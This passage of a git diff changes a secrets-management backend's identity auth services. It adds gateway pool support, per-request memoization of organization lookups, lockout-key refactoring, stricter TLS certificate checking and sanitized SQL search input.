| null | undefined = null; + let resolvedGatewayV2Id: string | null | undefined = null; + if (!gatewayPoolId && gatewayId) { + if (isGatewayV1) { + resolvedGatewayId = gatewayId; + } else { + resolvedGatewayV2Id = gatewayId; + } + } + const identityKubernetesAuth = await identityKubernetesAuthDAL.transaction(async (tx) => { const doc = await identityKubernetesAuthDAL.create( { @@ -877,8 +966,9 @@ export const identityKubernetesAuthServiceFactory = ({ accessTokenMaxTTL, accessTokenTTL, accessTokenNumUsesLimit, - gatewayId: isGatewayV1 ? gatewayId : null, - gatewayV2Id: isGatewayV1 ? null : gatewayId, + gatewayId: resolvedGatewayId, + gatewayV2Id: resolvedGatewayV2Id, + gatewayPoolId: gatewayPoolId ?? null, accessTokenTrustedIps: JSON.stringify(reformattedAccessTokenTrustedIps), encryptedKubernetesTokenReviewerJwt: tokenReviewerJwt ? encryptor({ plainText: Buffer.from(tokenReviewerJwt) }).cipherTextBlob @@ -903,6 +993,7 @@ export const identityKubernetesAuthServiceFactory = ({ allowedNames, allowedAudience, gatewayId, + gatewayPoolId, accessTokenTTL, accessTokenMaxTTL, accessTokenNumUsesLimit, @@ -1019,16 +1110,64 @@ export const identityKubernetesAuthServiceFactory = ({ ); } + // Handle gateway pool permission check + if (gatewayPoolId) { + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." + }); + } + const { permission: orgPermission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: identityMembershipOrg.scopeOrgId, + actorAuthMethod, + actorOrgId + }); + ForbiddenError.from(orgPermission).throwUnlessCan( + OrgPermissionGatewayPoolActions.AttachGatewayPools, + OrgPermissionSubjects.GatewayPool + ); + + const pool = await gatewayPoolDAL.findById(gatewayPoolId); + if (!pool || pool.orgId !== identityMembershipOrg.scopeOrgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${gatewayPoolId} not found` }); + } + } + // Strict check to see if gateway ID is undefined. It should update the gateway ID to null if its strictly set to null. - const shouldUpdateGatewayId = Boolean(gatewayId !== undefined); - const gatewayIdValue = isGatewayV1 ? gatewayId : null; - const gatewayV2IdValue = isGatewayV1 ? null : gatewayId; + const shouldUpdateGatewayId = Boolean(gatewayId !== undefined || gatewayPoolId !== undefined); + let gatewayIdValue: string | null | undefined = null; + let gatewayV2IdValue: string | null | undefined = null; + if (!gatewayPoolId && gatewayId) { + if (isGatewayV1) { + gatewayIdValue = gatewayId; + } else { + gatewayV2IdValue = gatewayId; + } + } + let gatewayPoolIdValue: string | null | undefined; + if (gatewayPoolId !== undefined) { + gatewayPoolIdValue = gatewayPoolId; + } else if (gatewayId !== undefined) { + gatewayPoolIdValue = null; + } else { + gatewayPoolIdValue = undefined; + } const effectiveTokenReviewMode = tokenReviewMode ?? identityKubernetesAuth.tokenReviewMode; const effectiveKubernetesHost = kubernetesHost !== undefined ? kubernetesHost : identityKubernetesAuth.kubernetesHost; - const effectiveGatewayId = - gatewayId !== undefined ? gatewayId : (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId); + const effectiveGatewayPoolId = gatewayPoolId !== undefined ? gatewayPoolId : identityKubernetesAuth.gatewayPoolId; + let effectiveGatewayId: string | null | undefined = null; + if (effectiveGatewayPoolId) { + effectiveGatewayId = null; + } else if (gatewayId !== undefined) { + effectiveGatewayId = gatewayId; + } else { + effectiveGatewayId = identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId; + } const { encryptor, decryptor } = await kmsService.createCipherPairWithDataKey({ type: KmsDataKey.Organization, @@ -1046,23 +1185,33 @@ export const identityKubernetesAuthServiceFactory = ({ effectiveCaCert = undefined; } - if (effectiveGatewayId) { + let validationGatewayId: string | null = effectiveGatewayId ?? null; + if (!validationGatewayId && effectiveGatewayPoolId) { + const picked = await gatewayPoolService.pickRandomHealthyGateway(effectiveGatewayPoolId); + validationGatewayId = picked.id; + } + + if (validationGatewayId) { if (effectiveTokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { - const gatewayExecutor = $createGatewayValidationRequest(effectiveGatewayId); + const gatewayExecutor = $createGatewayValidationRequest(validationGatewayId); logger.info( - { gatewayId: effectiveGatewayId }, + { gatewayId: validationGatewayId, gatewayPoolId: effectiveGatewayPoolId }, "Validating gateway connectivity to Kubernetes for auth method update" ); await validateKubernetesHostConnectivity({ gatewayExecutor }); await validateTokenReviewerPermissions({ gatewayExecutor }); } else if (effectiveTokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && effectiveKubernetesHost) { - const gatewayExecutor = $createGatewayValidationRequest(effectiveGatewayId, { + const gatewayExecutor = $createGatewayValidationRequest(validationGatewayId, { kubernetesHost: effectiveKubernetesHost, caCert: effectiveCaCert }); logger.info( - { gatewayId: effectiveGatewayId, kubernetesHost: effectiveKubernetesHost }, + { + gatewayId: validationGatewayId, + gatewayPoolId: effectiveGatewayPoolId, + kubernetesHost: effectiveKubernetesHost + }, "Validating Kubernetes connectivity through gateway for auth method update" ); @@ -1101,6 +1250,7 @@ export const identityKubernetesAuthServiceFactory = ({ allowedAudience, gatewayId: shouldUpdateGatewayId ? gatewayIdValue : undefined, gatewayV2Id: shouldUpdateGatewayId ? gatewayV2IdValue : undefined, + gatewayPoolId: gatewayPoolIdValue, accessTokenMaxTTL, accessTokenTTL, accessTokenNumUsesLimit, @@ -1281,7 +1431,10 @@ export const identityKubernetesAuthServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts index 8f06bfd5d33..a64018f6b90 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts @@ -21,6 +21,7 @@ export type TAttachKubernetesAuthDTO = { allowedNames: string; allowedAudience: string; gatewayId?: string | null; + gatewayPoolId?: string | null; accessTokenTTL: number; accessTokenMaxTTL: number; accessTokenNumUsesLimit: number; @@ -38,6 +39,7 @@ export type TUpdateKubernetesAuthDTO = { allowedNames?: string; allowedAudience?: string; gatewayId?: string | null; + gatewayPoolId?: string | null; accessTokenTTL?: number; accessTokenMaxTTL?: number; accessTokenNumUsesLimit?: number; diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts index 902c5b1b3b6..271fcd4902e 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts @@ -53,7 +53,7 @@ export const validateKubernetesHostConnectivity = async ({ const httpsAgent = new https.Agent({ ca: caCert || undefined, - rejectUnauthorized: Boolean(caCert) + rejectUnauthorized: true }); await blockLocalAndPrivateIpAddresses(kubernetesHost); @@ -156,7 +156,7 @@ export const validateTokenReviewerPermissions = async ({ const httpsAgent = new https.Agent({ ca: caCert || undefined, - rejectUnauthorized: Boolean(caCert) + rejectUnauthorized: true }); await blockLocalAndPrivateIpAddresses(kubernetesHost); diff --git a/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts b/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts index 736591c21cc..d5abaaa1331 100644 --- a/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts +++ b/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts @@ -31,7 +31,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -171,7 +173,9 @@ export const identityLdapAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -831,7 +835,10 @@ export const identityLdapAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -870,16 +877,24 @@ export const identityLdapAuthServiceFactory = ({ const identity = await identityDAL.findById(identityId); const orgId = identity?.orgId ?? null; - const LOCKOUT_KEY = `lockout:identity:${identityId}:${IdentityAuthMethod.LDAP_AUTH}:${usernameSlug}`; + const lockoutKey = KeyStorePrefixes.IdentityLockoutState(identityId, IdentityAuthMethod.LDAP_AUTH, usernameSlug); - const lockoutRaw = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRaw = await keyStore.getItem(lockoutKey); let lockout: LockoutObject | undefined; if (lockoutRaw) { lockout = JSON.parse(lockoutRaw) as LockoutObject; } - if (lockout && lockout?.lockedOut) { + const identityLdapAuth = await identityLdapAuthDAL.findOne({ identityId }); + if (!identityLdapAuth) { + throw new UnauthorizedError({ + message: "Invalid credentials", + detail: { reasonCode: "ldap_auth_not_found", identityId, orgId, identityName: identity?.name } + }); + } + + if (lockout && lockout?.lockedOut && identityLdapAuth.lockoutEnabled) { throw new UnauthorizedError({ message: "This identity auth method is temporarily locked, please try again later", detail: { reasonCode: "temporarily_locked", identityId, orgId, identityName: identity?.name } @@ -891,32 +906,24 @@ export const identityLdapAuthServiceFactory = ({ // If auth succeeds, clear any existing lockout if (lockout) { - await keyStore.deleteItem(LOCKOUT_KEY); + await keyStore.deleteItem(lockoutKey); } return result; } catch (error) { // eslint-disable-next-line @typescript-eslint/no-explicit-any, @typescript-eslint/no-unsafe-member-access if ((error as any).status === 401 || error instanceof UnauthorizedError) { - const identityLdapAuth = await identityLdapAuthDAL.findOne({ identityId }); - if (!identityLdapAuth) { - throw new UnauthorizedError({ - message: "Invalid credentials", - detail: { reasonCode: "ldap_auth_not_found", identityId, orgId, identityName: identity?.name } - }); - } - if (identityLdapAuth.lockoutEnabled) { let lock: Awaited> | undefined; try { - lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(LOCKOUT_KEY)], 500, { + lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(lockoutKey)], 500, { retryCount: 10, retryDelay: 300, retryJitter: 100 }); // Re-fetch the latest lockout data while holding the lock - const lockoutRawNew = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRawNew = await keyStore.getItem(lockoutKey); if (lockoutRawNew) { lockout = JSON.parse(lockoutRawNew) as LockoutObject; } else { @@ -939,7 +946,7 @@ export const identityLdapAuthServiceFactory = ({ } await keyStore.setItemWithExpiry( - LOCKOUT_KEY, + lockoutKey, lockout.lockedOut ? identityLdapAuth.lockoutDurationSeconds : identityLdapAuth.lockoutCounterResetSeconds, JSON.stringify(lockout) ); @@ -1016,7 +1023,7 @@ export const identityLdapAuthServiceFactory = ({ } const deleted = await keyStore.deleteItems({ - pattern: `lockout:identity:${identityId}:${IdentityAuthMethod.LDAP_AUTH}:*` + pattern: KeyStorePrefixes.IdentityLockoutStateByMethodPattern(identityId, IdentityAuthMethod.LDAP_AUTH) }); return { deleted, identityId, orgId: identityMembershipOrg.scopeOrgId }; diff --git a/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts b/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts index da5849b1077..c957500fdc2 100644 --- a/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts +++ b/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts @@ -25,7 +25,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -79,7 +81,9 @@ export const identityOciAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -555,7 +559,9 @@ export const identityOciAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts b/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts index a0f866fd1ba..66832a39654 100644 --- a/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts +++ b/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts @@ -1,6 +1,5 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; -import axios from "axios"; import https from "https"; import jwt from "jsonwebtoken"; import { JwksClient } from "jwks-rsa"; @@ -21,6 +20,7 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionIdentityActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, @@ -31,7 +31,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { getValueByDot } from "@app/lib/template/dot-access"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -91,7 +93,9 @@ export const identityOidcAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -108,13 +112,13 @@ export const identityOidcAuthServiceFactory = ({ caCert = decryptor({ cipherTextBlob: identityOidcAuth.encryptedCaCertificate }).toString(); } - const requestAgent = new https.Agent({ ca: caCert, rejectUnauthorized: !!caCert }); + const requestAgent = caCert ? new https.Agent({ ca: caCert, rejectUnauthorized: true }) : undefined; await blockLocalAndPrivateIpAddresses(identityOidcAuth.oidcDiscoveryUrl); let discoveryDoc: { jwks_uri: string }; try { - const response = await axios.get<{ jwks_uri: string }>( + const response = await request.get<{ jwks_uri: string }>( `${identityOidcAuth.oidcDiscoveryUrl}/.well-known/openid-configuration`, { httpsAgent: identityOidcAuth.oidcDiscoveryUrl.includes("https") ? requestAgent : undefined @@ -873,7 +877,10 @@ export const identityOidcAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-project/identity-project-dal.ts b/backend/src/services/identity-project/identity-project-dal.ts index 936f7c8c8e5..39f2256c392 100644 --- a/backend/src/services/identity-project/identity-project-dal.ts +++ b/backend/src/services/identity-project/identity-project-dal.ts @@ -20,6 +20,7 @@ import { } from "@app/db/schemas"; import { TIdentityLdapAuths } from "@app/db/schemas/identity-ldap-auths"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; import { ProjectIdentityOrderBy, TListProjectIdentityDTO } from "@app/services/identity-project/identity-project-types"; @@ -244,7 +245,7 @@ export const identityProjectDALFactory = (db: TDbClient) => { const fetchIdentitySubquery = (tx || db.replicaNode())(TableName.Identity) .where((qb) => { if (filter.search) { - void qb.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + void qb.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); } }) .join(TableName.Membership, `${TableName.Membership}.actorIdentityId`, `${TableName.Identity}.id`) @@ -517,7 +518,7 @@ export const identityProjectDALFactory = (db: TDbClient) => { } if (filter.search) { - void qb.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + void qb.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); } }) .count(); diff --git a/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts b/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts index 264d19bd1b7..5b2cc81adb6 100644 --- a/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts +++ b/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts @@ -29,7 +29,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -297,7 +299,9 @@ export const identitySpiffeAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); let subOrganizationId = isSubOrgIdentity ? org.id : null; @@ -888,7 +892,10 @@ export const identitySpiffeAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts b/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts index 4ad4695408f..03ee186c0fc 100644 --- a/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts +++ b/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts @@ -21,7 +21,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -54,7 +56,9 @@ const parseSubjectDetails = (data: string) => { const values: Record = {}; data.split("\n").forEach((el) => { const [key, value] = el.split("="); - values[key.trim()] = value.trim(); + if (key && value) { + values[key.trim()] = value.trim(); + } }); return values; }; @@ -88,7 +92,9 @@ export const identityTlsCertAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified diff --git a/backend/src/services/identity-token-auth/identity-token-auth-service.ts b/backend/src/services/identity-token-auth/identity-token-auth-service.ts index 5a5efb8c2d3..49828299c31 100644 --- a/backend/src/services/identity-token-auth/identity-token-auth-service.ts +++ b/backend/src/services/identity-token-auth/identity-token-auth-service.ts @@ -25,6 +25,8 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType, AuthTokenType } from "../auth/auth-type"; import { TIdentityDALFactory } from "../identity/identity-dal"; @@ -385,7 +387,10 @@ export const identityTokenAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -479,7 +484,10 @@ export const identityTokenAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, @@ -504,7 +512,9 @@ export const identityTokenAuthServiceFactory = ({ const identity = await identityDAL.findById(identityTokenAuth.identityId); if (!identity) throw new UnauthorizedError({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -776,7 +786,10 @@ export const identityTokenAuthServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, diff --git a/backend/src/services/identity-ua/identity-ua-service.ts b/backend/src/services/identity-ua/identity-ua-service.ts index eb27a2b7ecd..db5e9590e99 100644 --- a/backend/src/services/identity-ua/identity-ua-service.ts +++ b/backend/src/services/identity-ua/identity-ua-service.ts @@ -23,7 +23,9 @@ import { } from "@app/lib/errors"; import { checkIPAgainstBlocklist, extractIPDetails, isValidIpOrCidr, TIp } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -92,7 +94,9 @@ export const identityUaServiceFactory = ({ } const identity = await identityDAL.findById(identityUa.identityId); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a subOrganizationName is specified @@ -104,16 +108,20 @@ export const identityUaServiceFactory = ({ trustedIps: identityUa.clientSecretTrustedIps as TIp[] }); - const LOCKOUT_KEY = `lockout:identity:${identityUa.identityId}:${IdentityAuthMethod.UNIVERSAL_AUTH}:${clientId}`; + const lockoutKey = KeyStorePrefixes.IdentityLockoutState( + identityUa.identityId, + IdentityAuthMethod.UNIVERSAL_AUTH, + clientId + ); - const lockoutRaw = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRaw = await keyStore.getItem(lockoutKey); let lockout: LockoutObject | undefined; if (lockoutRaw) { lockout = JSON.parse(lockoutRaw) as LockoutObject; } - if (lockout && lockout.lockedOut) { + if (lockout && lockout.lockedOut && identityUa.lockoutEnabled) { throw new UnauthorizedError({ message: "This identity auth method is temporarily locked, please try again later", detail: { @@ -146,14 +154,14 @@ export const identityUaServiceFactory = ({ if (identityUa.lockoutEnabled) { let lock: Awaited> | undefined; try { - lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(LOCKOUT_KEY)], 300, { + lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(lockoutKey)], 300, { retryCount: 3, retryDelay: 300, retryJitter: 100 }); // Re-fetch the latest lockout data while holding the lock - const lockoutRawNew = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRawNew = await keyStore.getItem(lockoutKey); if (lockoutRawNew) { lockout = JSON.parse(lockoutRawNew) as LockoutObject; } else { @@ -181,7 +189,7 @@ export const identityUaServiceFactory = ({ } await keyStore.setItemWithExpiry( - LOCKOUT_KEY, + lockoutKey, lockout.lockedOut ? identityUa.lockoutDurationSeconds : identityUa.lockoutCounterResetSeconds, JSON.stringify(lockout) ); @@ -211,7 +219,7 @@ export const identityUaServiceFactory = ({ }); } else if (lockout) { // If credentials are valid, clear any existing lockout record - await keyStore.deleteItem(LOCKOUT_KEY); + await keyStore.deleteItem(lockoutKey); } const { clientSecretTTL, clientSecretNumUses, clientSecretNumUsesLimit } = validClientSecretInfo; @@ -758,7 +766,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -848,7 +859,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, @@ -949,7 +963,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.GetToken, @@ -1044,7 +1061,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, 